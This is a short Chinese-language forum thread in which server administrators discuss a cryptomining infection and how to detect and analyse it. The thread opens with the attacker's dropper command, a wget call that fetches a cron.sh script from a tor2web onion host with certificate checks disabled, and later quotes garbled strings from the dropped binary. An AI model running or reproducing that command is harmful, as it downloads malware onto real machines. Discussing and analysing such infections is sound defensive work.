wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh

能看懂中间是 base64 加密，开头和结尾是什么？

tor2web
隐藏的还挺好

萌新请教，怎么发现服务器被挖矿的哈？

= =服务商会发短信告诉你你的服务器 CPU 运行异常，长时间冲高。

我们是监控报的，上来看，发现有异常进程

这个开头和结尾是什么鬼，大佬了解吗

哦哦，好的，谢谢！

服务器挖矿，这收益率是很低的。CPU 扛矿。除非你是 GPU 型机子，很棒帮

你要不去看一下 XMR ？

s.bsst
6!8-
/>cp -pf /H
tmp/.00 CE
/lib/sys!emd !
-log!in6r
; toucpxhd

这是个前置的，一旦运行估计就开始下东西。安装，运行

找了个编辑器，打开就是这一堆的东西，看不懂。，

二进制程序要反汇编，拖到 IDA 里看看，没加密混淆的话，应该能看出大致的程序运行逻辑，如果确定是挖矿木马，那就没啥分析的价值了！顶多学学它的自启动脚本怎么写的！
话说服务器被挖矿，第一件事情不是应该查是如何被挂的马吗？

可能是破解的 xshell,或者是在非官网下载又不验证 hash 值

可能是历史遗留原因。